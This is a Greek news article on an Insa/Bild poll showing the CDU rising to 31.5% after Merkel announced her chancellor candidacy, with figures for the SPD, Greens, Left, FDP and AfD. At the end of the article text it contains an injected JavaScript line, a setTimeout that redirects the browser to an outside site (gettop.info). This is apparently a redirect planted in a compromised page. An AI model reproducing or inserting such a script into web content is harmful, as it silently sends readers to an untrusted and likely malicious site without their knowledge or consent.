Άνοδος του CDU μετά την ανακοίνωση της υποψηφιότητας Μέρκελ

0
3

 

Σύμφωνα με νέα δημοσκόπηση του Ινστιτούτου Ιnsa που δημοσιεύει η Bild, το 31,5% των Γερμανών θα ψήφιζαν το Χριστανοδημοκρατικό Κόμμα (CDU), δηλαδη 1,5% περισσότερο από την τελευταία δημοσκόπηση της ίδιας εφημερίδας την περασμένη εβδομάδα. Η ανακοίνωση της υποψηφιότητας της Άνγκελα Μέρκελ για την καγκελαρία φαίνεται πως ανέβασε τα ποσοστά του κόμματός της.

Κινητικότητα υπάρχει όμως και στους ψηφοφόρους των άλλων γερμανικών κομμάτων με εξαίρεση του Πράσινους (Die Gruenen) οι οποίοι παραμένουν σταθεροί στο 10,5%.

Σύμφωνα με τη δημοσκόπηση, οι Σοσιαλδημοκράτες του SPD υποχωρούν κατά 0,5% στο 22%, όπως και η Αριστερά (Die Linke) στο 10,5%. Κατά 1% μειώνεται σύμφωνα με τη δημοσκόπηση της Bild το ποσοστό των Φιλελευθέρων (5,5%), ενώ αυξάνεται κατά 0,5% εκείνο του λαϊκιστικού -ξενοφοβικού κόμματος Εναλλακτική για τη Γερμανία (AfD), το οποίο λαμβάνει το 15% των ψήφων και παραμένει επομένως τρίτο κόμμα στις προτιμήσεις των ερωτηθέντων πολιτών. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here